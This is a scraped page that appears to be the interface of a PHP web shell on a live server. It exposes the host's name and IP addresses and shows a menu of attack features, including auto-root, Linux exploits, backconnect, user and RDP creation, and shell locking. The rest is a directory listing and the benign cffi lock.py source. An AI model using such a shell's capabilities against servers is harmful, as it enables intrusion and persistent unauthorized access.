Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
lib64 /
python3.6 /
site-packages /
cffi /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
513
B
-rw-r--r--
_cffi_errors.h
3.82
KB
-rw-r--r--
_cffi_include.h
14.45
KB
-rw-r--r--
_embedding.h
17.27
KB
-rw-r--r--
api.py
41.08
KB
-rw-r--r--
backend_ctypes.py
41.46
KB
-rw-r--r--
cffi_opcode.py
5.59
KB
-rw-r--r--
commontypes.py
2.63
KB
-rw-r--r--
cparser.py
43.19
KB
-rw-r--r--
error.py
877
B
-rw-r--r--
ffiplatform.py
3.95
KB
-rw-r--r--
lock.py
747
B
-rw-r--r--
model.py
21.26
KB
-rw-r--r--
parse_c_type.h
5.84
KB
-rw-r--r--
pkgconfig.py
4.27
KB
-rw-r--r--
recompiler.py
63.08
KB
-rw-r--r--
setuptools_ext.py
8.72
KB
-rw-r--r--
vengine_cpy.py
42.3
KB
-rw-r--r--
vengine_gen.py
26.06
KB
-rw-r--r--
verifier.py
10.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lock.py
import sys if sys.version_info < (3,): try: from thread import allocate_lock except ImportError: from dummy_thread import allocate_lock else: try: from _thread import allocate_lock except ImportError: from _dummy_thread import allocate_lock ##import sys ##l1 = allocate_lock ##class allocate_lock(object): ## def __init__(self): ## self._real = l1() ## def __enter__(self): ## for i in range(4, 0, -1): ## print sys._getframe(i).f_code ## print ## return self._real.__enter__() ## def __exit__(self, *args): ## return self._real.__exit__(*args) ## def acquire(self, f): ## assert f is False ## return self._real.acquire(f)
Close